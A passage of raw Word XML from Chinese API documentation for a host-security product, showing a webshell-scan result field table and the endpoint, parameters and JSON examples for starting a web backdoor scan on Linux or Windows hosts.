          <w:p w14:paraId="27EB9F50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="154B956B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C99513F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A708E0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B06A5BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4910FC02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BA0A2FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="50132847" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30CEC477" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>typeDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0753D643" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="364F7154" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20BB64B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2A984351" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09FD124C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CB3B3AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25007A98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E6BDA09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F9520FD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E5B4F2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>filePath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FF90F2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10C7C9B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B91B337" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="78A999FB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="171F8C37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>fileMd5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3052C8A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72E8DB73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A37C5BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件MD5值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="795282D9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D85267A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fileSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1821C634" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62BD6EFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int(15）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1857BF4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="59A27184" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D72C088" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>regexDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66510B6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E3055B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F548C98" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E54400A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47E9CE09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>matchCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F921D7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="538225AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42EBE245" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>命中规则数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B78188E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3129AAB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>modifyTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2686AAF6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1759649B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B753B7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后修改时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5657B7E6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0952D9E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A7D3B7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="416037CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="234983F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否命中白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E36DC5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="295" w:name="_Toc115166220"/>
      <w:bookmarkStart w:id="296" w:name="web后门扫描"/>
      <w:bookmarkEnd w:id="294"/>
      <w:r>
        <w:t>Web后门扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="295"/>
    </w:p>
    <w:p w14:paraId="19B054D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供web后门执行扫描任务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB2B3F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAEBCA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60876BA4"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225"/>
        <w:gridCol w:w="1213"/>
        <w:gridCol w:w="1034"/>
        <w:gridCol w:w="6610"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A43E82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63955C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="209CC661" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39734038" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15737B0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6BA40459" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A2EF35E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="263B4201" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A5FE692" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C1D5072" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>范围，0:当前账号管理下的全部主机； 1:自定义主机； 2:自定义业务</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>组；</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="349925F7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E47A97F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E3E149F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EAA0D66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CD0E2CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44509FD2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7252529D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B3841BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="183E5D9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B99BF67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=2, 则groups不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6410071D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EDDCD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>// 当选全部主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>// 当选自定义主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["979f3c4d44b2e765", "979f3c4d44b2e766"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>// 当选自定义业务组</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groups": [1, 2, 3]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213E273B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6873D753" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
